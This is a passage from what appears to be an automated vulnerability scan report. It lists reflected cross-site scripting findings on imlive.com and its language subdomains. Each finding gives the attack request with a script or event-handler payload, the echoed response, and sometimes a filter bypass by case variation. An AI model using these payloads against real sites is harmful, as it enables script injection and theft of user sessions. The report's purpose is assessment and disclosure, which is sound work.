GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/25492'onerror%3d'alert(1)'4929c58198 HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSRTQCRC=GFLJMIMAIHNDHDFGKCOMPNDP; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:17 GMT
Connection: close
Content-Length: 8313
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=es.imlive.com&ul=/webcam-login/25492'onerror='alert(1)'4929c58198/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://es.imlive.com:80/webcam-login/25492'onerror='alert(1)'4929c58198/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.38. http://es.imlive.com/waccess/ [promocode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acb36"><script>alert(1)</script>678c2c2a5a9 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583acb36"><script>alert(1)</script>678c2c2a5a9&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:17 GMT
Connection: close
Content-Length: 23570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583acb36"><script>alert(1)</script>678c2c2a5a9&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.39. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b566'-alert(1)-'c7449b1e1ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?4b566'-alert(1)-'c7449b1e1ba=1 HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=r3zdvd55v5kn0b55yjmnpi55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=r3zdvd55v5kn0b55yjmnpi55; path=/; HttpOnly
Set-Cookie: spvdr=vd=a1d85813-857c-4f7f-9b93-2ebdcfdaba8e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:19 GMT
Connection: close
Content-Length: 19336
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=fr.imlive.com&ul=/?4b566'-alert(1)-'c7449b1e1ba=1&qs=4b566'-alert(1)-'c7449b1e1ba=1&qs=4b566'-alert(1)-'c7449b1e1ba=1&iy=dallas&id=44&iu=1&vd=a1d85813-857c-4f7f-9b93-2ebdcfdaba8e';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.40. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647=1 HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ilg0g1555xawgsnqnx3jtzbh; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ilg0g1555xawgsnqnx3jtzbh; path=/; HttpOnly
Set-Cookie: spvdr=vd=a1a5e720-2007-4ea7-a708-9070c86d04f1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:18 GMT
Connection: close
Content-Length: 19737
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||2a9d8"><script>alert(1)</script>bf56a35d647~1');return false;">
...[SNIP]...

2.41. http://fr.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17fa1'onerror%3d'alert(1)'4373c72317b was submitted in the gotopage parameter. This input was echoed as 17fa1'onerror='alert(1)'4373c72317b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/17fa1'onerror%3d'alert(1)'4373c72317b HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:22 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQRCSC=BMMFJIMAJCKNADIOHDLHHPAA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 8315
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=fr.imlive.com&ul=/webcam-login/17fa1'onerror='alert(1)'4373c72317b/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://fr.imlive.com:80/webcam-login/17fa1'onerror='alert(1)'4373c72317b/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.42. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ff7"><script>alert(1)</script>e0815795bf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?84ff7"><script>alert(1)</script>e0815795bf3=1 HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rw3vjgrgjrpidqai44mlul2g; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rw3vjgrgjrpidqai44mlul2g; path=/; HttpOnly
Set-Cookie: spvdr=vd=b549c441-750e-4a3f-9af7-09b50e1c51fb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:22 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 21675
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||84ff7"><script>alert(1)</script>e0815795bf3~1');return false;">
...[SNIP]...

2.43. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b12e'-alert(1)-'11d097f86af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2b12e'-alert(1)-'11d097f86af=1 HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=c4sah4vvtrpptgagzrlohq45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=c4sah4vvtrpptgagzrlohq45; path=/; HttpOnly
Set-Cookie: spvdr=vd=47dec44d-298a-4e64-82a7-f991aeebff7d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:22 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:21 GMT
Connection: close
Content-Length: 21274
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=gr.imlive.com&ul=/?2b12e'-alert(1)-'11d097f86af=1&qs=2b12e'-alert(1)-'11d097f86af=1&qs=2b12e'-alert(1)-'11d097f86af=1&iy=dallas&id=44&iu=1&vd=47dec44d-298a-4e64-82a7-f991aeebff7d';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.44. http://gr.imlive.com/waccess/ [cbname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81248"><script>alert(1)</script>dd3960e35d8 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=81248"><script>alert(1)</script>dd3960e35d8&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:31 GMT
Connection: close
Content-Length: 24865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=81248"><script>alert(1)</script>dd3960e35d8&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.45. http://gr.imlive.com/waccess/ [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 855e3"><script>alert(1)</script>7145c8255ab was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=855e3"><script>alert(1)</script>7145c8255ab&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:35 GMT
Connection: close
Content-Length: 24865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=855e3"><script>alert(1)</script>7145c8255ab&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.46. http://gr.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d7c5'onerror%3d'alert(1)'1cb395fc54c was submitted in the gotopage parameter. This input was echoed as 2d7c5'onerror='alert(1)'1cb395fc54c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2d7c5'onerror%3d'alert(1)'1cb395fc54c HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQRQRCTC=GAOPGJMAIPBIPMLIPIDNAHJF; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:31 GMT
Connection: close
Content-Length: 8306
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=gr.imlive.com&ul=/waccess/2d7c5'onerror='alert(1)'1cb395fc54c/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://gr.imlive.com:80/waccess/2d7c5'onerror='alert(1)'1cb395fc54c/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.47. http://gr.imlive.com/waccess/ [promocode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1c5"><script>alert(1)</script>6962831ce28 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA55833e1c5"><script>alert(1)</script>6962831ce28&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:26 GMT
Connection: close
Content-Length: 24865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA55833e1c5"><script>alert(1)</script>6962831ce28&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.48. http://imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17713'-alert(1)-'0edf03efbd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?17713'-alert(1)-'0edf03efbd6=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
